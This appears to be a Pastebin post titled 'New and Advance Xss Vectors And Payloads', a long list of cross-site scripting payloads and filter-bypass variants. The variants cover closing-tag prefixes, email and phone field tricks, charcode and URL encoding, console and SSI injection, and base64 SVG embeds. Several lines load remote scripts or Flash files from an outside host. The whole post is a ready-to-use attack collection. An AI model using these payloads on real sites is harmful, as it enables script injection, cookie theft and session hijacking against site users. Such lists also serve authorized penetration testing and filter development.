API tools faq
paste
Advertisement
zeeshan-haxor-zesn

New and Advance Xss Vectors And Payloads By Zeeshan Haxor (Z

zeeshan-haxor-zesn
Sep 12th, 2015
480
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.46 KB | None | 0 0
raw download clone embed print report
  1. New and Advance Xss Vectors And Payloads By Zeeshan Haxor (ZeSn)
  2.  
  3.  
  4. <meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  5.  
  6. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  7.  
  8. <SCRIPT>document.cookie=true;</SCRIPT>
  9.  
  10. <IMG SRC=”jav ascript:document.cookie=true;”>
  11.  
  12. <IMG SRC=”javascript:document.cookie=true;”>
  13.  
  14. <IMG SRC=”  javascript:document.cookie=true;”>
  15.  
  16. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  17.  
  18. <SCRIPT>document.cookie=true;//<</SCRIPT>
  19.  
  20. <SCRIPT <B>document.cookie=true;</SCRIPT>
  21.  
  22. <IMG SRC=”javascript:document.cookie=true;”>
  23.  
  24. <iframe src=”javascript:document.cookie=true;>
  25.  
  26. <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  27.  
  28. </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  29.  
  30. <INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  31.  
  32. <BODY BACKGROUND=”javascript:document.cookie=true;”>
  33.  
  34. <BODY ONLOAD=document.cookie=true;>
  35.  
  36. <IMG DYNSRC=”javascript:document.cookie=true;”>
  37.  
  38. <IMG LOWSRC=”javascript:document.cookie=true;”>
  39.  
  40. <BGSOUND SRC=”javascript:document.cookie=true;”>
  41.  
  42. <BR SIZE=”&{document.cookie=true}”>
  43.  
  44. <LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  45.  
  46. <LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  47.  
  48. <STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  49.  
  50. ¼script¾document.cookie=true;¼/script¾
  51.  
  52. <IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  53.  
  54. <FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  55.  
  56. <TABLE BACKGROUND=”javascript:document.cookie=true;”>
  57.  
  58. <TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  59.  
  60. <DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  61.  
  62. <DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  63.  
  64. <DIV STYLE=”width: expression(document.cookie=true);”>
  65.  
  66. <STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  67.  
  68. <IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  69.  
  70. <CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  71.  
  72. exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  73.  
  74. <STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  75.  
  76. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  77.  
  78. <STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  79.  
  80. <SCRIPT>document.cookie=true;</SCRIPT>
  81.  
  82. <BASE HREF=”javascript:document.cookie=true;//”>
  83.  
  84. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  85.  
  86. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  87.  
  88. <XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  89.  
  90. <HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  91.  
  92. <? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  93.  
  94. <HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  95.  
  96. <a href=”javascript#document.cookie=true;”>
  97.  
  98. <div onmouseover=”document.cookie=true;”>
  99.  
  100. <img src=”javascript:document.cookie=true;”>
  101.  
  102. <img dynsrc=”javascript:document.cookie=true;”>
  103.  
  104. <input type=”image” dynsrc=”javascript:document.cookie=true;”>
  105.  
  106. <bgsound src=”javascript:document.cookie=true;”>
  107.  
  108. &<script>document.cookie=true;</script>
  109.  
  110. &{document.cookie=true;};
  111.  
  112. <img src=&{document.cookie=true;};>
  113.  
  114. <link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  115.  
  116. <img src=”mocha:document.cookie=true;”>
  117.  
  118. <img src=”livescript:document.cookie=true;”>
  119.  
  120. <a href=”about:<script>document.cookie=true;</script>”>
  121.  
  122. <body onload=”document.cookie=true;”>
  123.  
  124. <div style=”background-image: url(javascript:document.cookie=true;);”>
  125.  
  126. <div style=”behaviour: url([link to code]);”>
  127.  
  128. <div style=”binding: url([link to code]);”>
  129.  
  130. <div style=”width: expression(document.cookie=true;);”>
  131.  
  132. <style type=”text/javascript”>document.cookie=true;</style>
  133.  
  134. <object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  135.  
  136. <style><!–</style><script>document.cookie=true;//–></script>
  137.  
  138. <<script>document.cookie=true;</script>
  139.  
  140. <script>document.cookie=true;//–></script>
  141.  
  142. <!– — –><script>document.cookie=true;</script><!– — –>
  143.  
  144. <img src=”blah”onmouseover=”document.cookie=true;”>
  145.  
  146. <img src=”blah>” onmouseover=”document.cookie=true;”>
  147.  
  148. <xml src=”javascript:document.cookie=true;”>
  149.  
  150. <xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  151.  
  152. <div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160. Cross Site Scripting Strings with close TAG:
  161.  
  162.  
  163.  
  164. >”<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  165.  
  166. >”<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  167.  
  168. >”<SCRIPT>document.cookie=true;</SCRIPT>
  169.  
  170. >”<IMG SRC=”jav ascript:document.cookie=true;”>
  171.  
  172. >”<IMG SRC=”javascript:document.cookie=true;”>
  173.  
  174. >”<IMG SRC=”  javascript:document.cookie=true;”>
  175.  
  176. >”<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  177.  
  178. >”<SCRIPT>document.cookie=true;//<</SCRIPT>
  179.  
  180. >”<SCRIPT <B>document.cookie=true;</SCRIPT>
  181.  
  182. >”<IMG SRC=”javascript:document.cookie=true;”>
  183.  
  184. >”<iframe src=”javascript:document.cookie=true;>
  185.  
  186. >”<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  187.  
  188. >”</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  189.  
  190. >”<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  191.  
  192. >”<BODY BACKGROUND=”javascript:document.cookie=true;”>
  193.  
  194. >”<BODY ONLOAD=document.cookie=true;>
  195.  
  196. >”<IMG DYNSRC=”javascript:document.cookie=true;”>
  197.  
  198. >”<IMG LOWSRC=”javascript:document.cookie=true;”>
  199.  
  200. >”<BGSOUND SRC=”javascript:document.cookie=true;”>
  201.  
  202. >”<BR SIZE=”&{document.cookie=true}”>
  203.  
  204. >”<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  205.  
  206. >”<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  207.  
  208. >”<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  209.  
  210. >”¼script¾document.cookie=true;¼/script¾
  211.  
  212. >”<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  213.  
  214. >”<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  215.  
  216. >”<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  217.  
  218. >”<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  219.  
  220. >”<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  221.  
  222. >”<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  223.  
  224. >”<DIV STYLE=”width: expression(document.cookie=true);”>
  225.  
  226. >”<STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  227.  
  228. >”<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  229.  
  230. >”<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  231.  
  232. >”exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  233.  
  234. >”<STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  235.  
  236. >”<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  237.  
  238. >”<STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  239.  
  240. >”<SCRIPT>document.cookie=true;</SCRIPT>
  241.  
  242. >”<BASE HREF=”javascript:document.cookie=true;//”>
  243.  
  244. >”<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  245.  
  246. >”<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  247.  
  248. >”<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  249.  
  250. >”<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  251.  
  252. >”<? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  253.  
  254. >”<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  255.  
  256. >”<a href=”javascript#document.cookie=true;”>
  257.  
  258. >”<div onmouseover=”document.cookie=true;”>
  259.  
  260. >”<img src=”javascript:document.cookie=true;”>
  261.  
  262. >”<img dynsrc=”javascript:document.cookie=true;”>
  263.  
  264. >”<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  265.  
  266. >”<bgsound src=”javascript:document.cookie=true;”>
  267.  
  268. >”&<script>document.cookie=true;</script>
  269.  
  270. >”&{document.cookie=true;};
  271.  
  272. >”<img src=&{document.cookie=true;};>
  273.  
  274. >”<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  275.  
  276. >”<img src=”mocha:document.cookie=true;”>
  277.  
  278. >”<img src=”livescript:document.cookie=true;”>
  279.  
  280. >”<a href=”about:<script>document.cookie=true;</script>”>
  281.  
  282. >”<body onload=”document.cookie=true;”>
  283.  
  284. >”<div style=”background-image: url(javascript:document.cookie=true;);”>
  285.  
  286. >”<div style=”behaviour: url([link to code]);”>
  287.  
  288. >”<div style=”binding: url([link to code]);”>
  289.  
  290. >”<div style=”width: expression(document.cookie=true;);”>
  291.  
  292. >”<style type=”text/javascript”>document.cookie=true;</style>
  293.  
  294. >”<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  295.  
  296. >”<style><!–</style><script>document.cookie=true;//–></script>
  297.  
  298. >”<<script>document.cookie=true;</script>
  299.  
  300. >”<script>document.cookie=true;//–></script>
  301.  
  302. >”<!– — –><script>document.cookie=true;</script><!– — –>
  303.  
  304. >”<img src=”blah”onmouseover=”document.cookie=true;”>
  305.  
  306. >”<img src=”blah>” onmouseover=”document.cookie=true;”>
  307.  
  308. >”<xml src=”javascript:document.cookie=true;”>
  309.  
  310. >”<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  311.  
  312. >”<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319.  
  320. Cross Site Scripting Strings with negative value & TAG:
  321.  
  322. -1<meta http-equiv=”refresh” content=”0;url=javascript:document.cookie=true;”>
  323.  
  324. -1<META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.cookie=true</SCRIPT>”>
  325.  
  326. -1<SCRIPT>document.cookie=true;</SCRIPT>
  327.  
  328. -1<IMG SRC=”jav ascript:document.cookie=true;”>
  329.  
  330. -1<IMG SRC=”javascript:document.cookie=true;”>
  331.  
  332. -1<IMG SRC=”  javascript:document.cookie=true;”>
  333.  
  334. -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
  335.  
  336. -1<SCRIPT>document.cookie=true;//<</SCRIPT>
  337.  
  338. -1<SCRIPT <B>document.cookie=true;</SCRIPT>
  339.  
  340. -1<IMG SRC=”javascript:document.cookie=true;”>
  341.  
  342. -1<iframe src=”javascript:document.cookie=true;>
  343.  
  344. -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
  345.  
  346. -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
  347.  
  348. -1<INPUT TYPE=”IMAGE” SRC=”javascript:document.cookie=true;”>
  349.  
  350. -1<BODY BACKGROUND=”javascript:document.cookie=true;”>
  351.  
  352. -1<BODY ONLOAD=document.cookie=true;>
  353.  
  354. -1<IMG DYNSRC=”javascript:document.cookie=true;”>
  355.  
  356. -1<IMG LOWSRC=”javascript:document.cookie=true;”>
  357.  
  358. -1<BGSOUND SRC=”javascript:document.cookie=true;”>
  359.  
  360. -1<BR SIZE=”&{document.cookie=true}”>
  361.  
  362. -1<LAYER SRC=”javascript:document.cookie=true;”></LAYER>
  363.  
  364. -1<LINK REL=”stylesheet” HREF=”javascript:document.cookie=true;”>
  365.  
  366. -1<STYLE>li {list-style-image: url(“javascript:document.cookie=true;”);</STYLE><UL><LI>CrossSiteScripting
  367.  
  368. -1¼script¾document.cookie=true;¼/script¾
  369.  
  370. -1<IFRAME SRC=”javascript:document.cookie=true;”></IFRAME>
  371.  
  372. -1<FRAMESET><FRAME SRC=”javascript:document.cookie=true;”></FRAMESET>
  373.  
  374. -1<TABLE BACKGROUND=”javascript:document.cookie=true;”>
  375.  
  376. -1<TABLE><TD BACKGROUND=”javascript:document.cookie=true;”>
  377.  
  378. -1<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  379.  
  380. -1<DIV STYLE=”background-image: url(javascript:document.cookie=true;)”>
  381.  
  382. -1<DIV STYLE=”width: expression(document.cookie=true);”>
  383.  
  384. -1<STYLE>@im\port’\ja\vasc\ript:document.cookie=true’;</STYLE>
  385.  
  386. -1<IMG STYLE=”CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
  387.  
  388. -1<CrossSiteScripting STYLE=”CrossSiteScripting:expression(document.cookie=true)”>
  389.  
  390. -1exp/*<A STYLE=’no\CrossSiteScripting:noCrossSiteScripting(“*//*”);CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)’>
  391.  
  392. -1<STYLE TYPE=”text/javascript”>document.cookie=true;</STYLE>
  393.  
  394. -1<STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true”);}</STYLE><A CLASS=CrossSiteScripting></A>
  395.  
  396. -1<STYLE type=”text/css”>BODY{background:url(“javascript:document.cookie=true”)}</STYLE>
  397.  
  398. -1<SCRIPT>document.cookie=true;</SCRIPT>
  399.  
  400. -1<BASE HREF=”javascript:document.cookie=true;//”>
  401.  
  402. -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
  403.  
  404. -1<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:document.cookie=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  405.  
  406. -1<XML ID=”CrossSiteScripting”><I><B><IMG SRC=”javas<!– –>cript:document.cookie=true”></B></I></XML><SPAN DATASRC=”#CrossSiteScripting” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  407.  
  408. -1<HTML><BODY><?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”><?import namespace=”t” implementation=”#default#time2″><t:set attributeName=”innerHTML” to=”CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>”></BODY></HTML>
  409.  
  410. -1<? echo(‘<SCR)’;echo(‘IPT>document.cookie=true</SCRIPT>’); ?>
  411.  
  412. -1<HEAD><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7″> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
  413.  
  414. -1<a href=”javascript#document.cookie=true;”>
  415.  
  416. -1<div onmouseover=”document.cookie=true;”>
  417.  
  418. -1<img src=”javascript:document.cookie=true;”>
  419.  
  420. -1<img dynsrc=”javascript:document.cookie=true;”>
  421.  
  422. -1<input type=”image” dynsrc=”javascript:document.cookie=true;”>
  423.  
  424. -1<bgsound src=”javascript:document.cookie=true;”>
  425.  
  426. -1&<script>document.cookie=true;</script>
  427.  
  428. -1&{document.cookie=true;};
  429.  
  430. -1<img src=&{document.cookie=true;};>
  431.  
  432. -1<link rel=”stylesheet” href=”javascript:document.cookie=true;”>
  433.  
  434. -1<img src=”mocha:document.cookie=true;”>
  435.  
  436. -1<img src=”livescript:document.cookie=true;”>
  437.  
  438. -1<a href=”about:<script>document.cookie=true;</script>”>
  439.  
  440. -1<body onload=”document.cookie=true;”>
  441.  
  442. -1<div style=”background-image: url(javascript:document.cookie=true;);”>
  443.  
  444. -1<div style=”behaviour: url([link to code]);”>
  445.  
  446. -1<div style=”binding: url([link to code]);”>
  447.  
  448. -1<div style=”width: expression(document.cookie=true;);”>
  449.  
  450. -1<style type=”text/javascript”>document.cookie=true;</style>
  451.  
  452. -1<object classid=”clsid:…” codebase=”javascript:document.cookie=true;”>
  453.  
  454. -1<style><!–</style><script>document.cookie=true;//–></script>
  455.  
  456. -1<<script>document.cookie=true;</script>
  457.  
  458. -1<script>document.cookie=true;//–></script>
  459.  
  460. -1<!– — –><script>document.cookie=true;</script><!– — –>
  461.  
  462. -1<img src=”blah”onmouseover=”document.cookie=true;”>
  463.  
  464. -1<img src=”blah>” onmouseover=”document.cookie=true;”>
  465.  
  466. -1<xml src=”javascript:document.cookie=true;”>
  467.  
  468. -1<xml id=”X”><a><b><script>document.cookie=true;</script>;</b></a></xml>
  469.  
  470. -1<div datafld=”b” dataformatas=”html” datasrc=”#X”></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
  471.  
  472.  
  473.  
  474.  
  475.  
  476. Cross Site Scripting Strings Restriction Bypass Mail:
  477.  
  478.  
  479.  
  480. >”<iframe src=http://vulnerability-lab.com/>@gmail.com
  481.  
  482. >”<script>alert(document.cookie)</script><div style=”1@gmail.com
  483.  
  484. >”<script>alert(document.cookie)</script>@gmail.com
  485.  
  486.  
  487.  
  488. <iframe src=http://vulnerability-lab.com/>@gmail.com
  489.  
  490. <script>alert(document.cookie)</script><div style=”1@gmail.com
  491.  
  492. <script>alert(document.cookie)</script>@gmail.com
  493.  
  494.  
  495.  
  496.  
  497.  
  498. Cross Site Scripting Strings Restriction Bypass Phone:
  499.  
  500. +49/>”<iframe src=http://vulnerability-lab.com>1337
  501.  
  502. “><iframe src=” onload=alert(‘mphone’)>
  503.  
  504. <iframe src=http://vulnerability-lab.com>1337+1
  505.  
  506.  
  507.  
  508.  
  509.  
  510. Cross Site Scripting Strings Restriction Bypass Obfuscation
  511.  
  512.  
  513.  
  514. >“<ScriPt>ALeRt(“VlAb”)</scriPt>
  515.  
  516. >”<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>
  517.  
  518.  
  519.  
  520.  
  521.  
  522. Cross Site Scripting Strings Restriction Bypass String to Charcode
  523.  
  524.  
  525.  
  526. <html><body>
  527.  
  528. <button.onclick=”alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
  529.  
  530. 101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
  531.  
  532. 10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));”>String:fr
  533.  
  534. om.Char.Code</button></body></html>
  535.  
  536.  
  537.  
  538.  
  539.  
  540. ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\”;alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
  541.  
  542. ”;!–“<CrossSiteScripting>=&{()}
  543.  
  544.  
  545.  
  546.  
  547.  
  548.  
  549.  
  550. Cross Site Scripting Strings Restriction Bypass encoded frame url
  551.  
  552.  
  553.  
  554. %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
  555.  
  556. %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
  557.  
  558. %73%63%72%69%70%74%3E
  559.  
  560.  
  561.  
  562.  
  563.  
  564.  
  565.  
  566. Cross Site Scripting Strings via Console:
  567.  
  568. set vlan name 1337 <script>alert(document.cookie)</script>
  569.  
  570. set system name <iframe src=http://www.vulnerability-lab.com>
  571.  
  572. set system location “><iframe src=a onload=alert(“VL”) <
  573.  
  574. set system contact <script>alert(‘VL’)</script>
  575.  
  576.  
  577.  
  578. insert <script>alert(document.cookie)</script>
  579.  
  580. add <!–#exec cmd=”/bin/echo ‘<SCR'”–><!–#exec cmd=”/bin/echo ‘IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'”–>
  581.  
  582. add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
  583.  
  584.  
  585.  
  586. add topic <iframe src=http://www.vulnerability-lab.com>
  587.  
  588. add name <script>alert(‘VL’)</script>
  589.  
  590.  
  591.  
  592. perl -e ‘print “<IMG SRC=java\0script:alert(\”CrossSiteScripting\”)>”;’ > out
  593.  
  594. perl -e ‘print “<SCR\0IPT>alert(\”CrossSiteScripting\”)</SCR\0IPT>”;’ > out
  595.  
  596.  
  597.  
  598. <!–[if gte IE 4]> <SCRIPT>alert(‘CrossSiteScripting’);</SCRIPT> <![endif]–>
  599.  
  600.  
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607.  
  608. Cross Site Scripting Strings on per line validation applications:
  609.  
  610.  
  611.  
  612. <IMG
  613.  
  614. SRC
  615.  
  616. =
  617.  
  619.  
  620. j
  621.  
  622. a
  623.  
  624. v
  625.  
  626. a
  627.  
  628. s
  629.  
  630. c
  631.  
  632. r
  633.  
  634. i
  635.  
  636. p
  637.  
  638. t
  639.  
  640. :
  641.  
  642. a
  643.  
  644. l
  645.  
  646. e
  647.  
  648. r
  649.  
  650. t
  651.  
  652. (
  653.  
  655.  
  656. V
  657.  
  658. L
  659.  
  660. A
  661.  
  662. B
  663.  
  665.  
  666. )
  667.  
  669.  
  670. >
  671.  
  672.  
  673.  
  674.  
  675.  
  676.  
  677.  
  678. Cross Site Scripting Strings Embed:
  679.  
  680.  
  681.  
  682. <EMBED SRC=”http://vulnerability-lab.com/CrossSiteScripting.swf” AllowScriptAccess=”always”></EMBED>
  683.  
  684.  
  685.  
  686. <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  687.  
  688.  
  689.  
  690. <EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
  691.  
  692.  
  693.  
  694.  
  695.  
  696.  
  697.  
  698. Cross Site Scripting Strings Action Script:
  699.  
  700.  
  701.  
  702. <object type=”application/x-shockwave-flash” data=”http://www.vulnerability-lab.com/hack.swf” width=”300″ height=”300″>
  703.  
  704. <param name=”movie” value=”http://www.subhohalder.com/xysecteam.swf” />
  705.  
  706. <param name=”quality” value=”high” />
  707.  
  708. <param name=”scale” value=”noscale” />
  709.  
  710. <param name=”salign” value=”LT” />
  711.  
  712. <param name=”allowScriptAccess” value=”always” />
  713.  
  714. <param name=”menu” value=”false” />
  715.  
  716. </object>
  717.  
  718.  
  719.  
  720.  
  721.  
  722.  
  723.  
  724.  
  725.  
  726. <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
  727.  
  728. <<SCRIPT>alert(“CrossSiteScripting”);//<</SCRIPT>
  729.  
  730. <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
  731.  
  732. <SCRIPT SRC=//vulnerability-lab.com/.js>
  733.  
  734. <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
  735.  
  736. <SCRIPT a=”>” SRC=”http://vulnerability-lab.com/CrossSiteScripting.js”></SCRIPT>
  737.  
  738. <SCRIPT a=`>` SRC=”http://vulnerability-lab.com/CrossSiteScripting.js”></SCRIPT>
  739.  
  740. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://vulnerability-lab.com/CrossSiteScripting.js”></SCRIPT>
  741.  
  742. </TITLE><SCRIPT>alert(“CrossSiteScripting”);</SCRIPT>
  743.  
  744.  
  745.  
  746.  
  747.  
  748. <IMG SRC=”javascript:alert(‘CrossSiteScripting’);”>
  749.  
  750. <IMG SRC=javascript:alert(‘CrossSiteScripting’)>
  751.  
  752. <IMG SRC=JaVaScRiPt:alert(‘CrossSiteScripting’)>
  753.  
  754. <IMG SRC=javascript:alert(“CrossSiteScripting”)>
  755.  
  756. <IMG SRC=`javascript:alert(“RM’CrossSiteScripting'”)`>
  757.  
  758. <IMG “””><SCRIPT>alert(“CrossSiteScripting”)</SCRIPT>”>
  759.  
  760. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  761.  
  762. <IMG SRC=”jav ascript:alert(‘CrossSiteScripting’);”>
  763.  
  764. <IMG SRC=”jav&#x09;ascript:alert(‘CrossSiteScripting’);”>
  765.  
  766. <IMG SRC=”jav&#x0A;ascript:alert(‘CrossSiteScripting’);”>
  767.  
  768. <IMG SRC=”jav&#x0D;ascript:alert(‘CrossSiteScripting’);”>
  769.  
  770. <IMG SRC=”  javascript:alert(‘CrossSiteScripting’);”>
  771.  
  772. <IMG SRC=”javascript:alert(‘CrossSiteScripting’)”
  773.  
  774. <IMG DYNSRC=”javascript:alert(‘CrossSiteScripting’)”>
  775.  
  776. <IMG LOWSRC=”javascript:alert(‘CrossSiteScripting’)”>
  777.  
  778. <IMG SRC=’vbscript:msgbox(“CrossSiteScripting”)’>
